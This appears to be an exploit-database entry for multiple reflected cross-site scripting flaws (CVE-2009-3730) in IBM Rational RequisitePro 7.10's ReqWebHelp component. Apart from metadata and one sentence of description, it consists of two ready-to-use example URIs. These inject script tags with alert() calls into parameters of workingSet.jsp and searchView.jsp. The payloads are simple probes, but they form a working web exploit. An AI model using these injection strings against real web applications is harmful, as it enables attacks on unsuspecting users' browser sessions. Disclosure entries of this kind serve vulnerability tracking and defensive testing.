IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting Vulnerabilities

Author: IBM
type: webapps
platform: jsp
port: 
date_added: 2009-10-14  
date_updated:   
verified: 1  
codes: CVE-2009-3730;OSVDB-59089;OSVDB-59088  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10094.txt  

Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=

http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>